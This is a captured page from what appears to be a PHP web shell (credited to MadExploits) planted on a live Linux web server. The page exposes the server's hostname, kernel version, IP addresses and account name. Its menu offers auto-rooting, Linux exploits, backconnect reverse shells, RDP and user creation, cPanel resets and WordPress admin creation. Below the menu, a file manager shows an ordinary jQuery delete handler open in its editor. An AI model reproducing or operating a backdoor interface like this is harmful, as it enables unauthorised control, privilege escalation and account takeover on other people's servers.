Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
chaska /
public /
js /
local /
[ HOME SHELL ]
Name
Size
Permission
Action
editar.js
1.18
KB
-rw-r--r--
listar.js
701
B
-rw-r--r--
nuevo.js
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : listar.js
$(function () { $('.button_delete_modal').on('click', function() { var id = $(this).data("id"); $('#delete_modal').modal({ closable: false, onApprove : function() { sendDelete(id); } }).modal('show'); }); function sendDelete(id) { var data = {id_local : id}; $.requestApi('/sucursal/eliminar', data, 'POST', function (resolve) { if (resolve) { if (resolve.message === "success") { $('[data-table="'+id+'"]').remove(); } $.showMessages(resolve); } }); return false; }; });
Close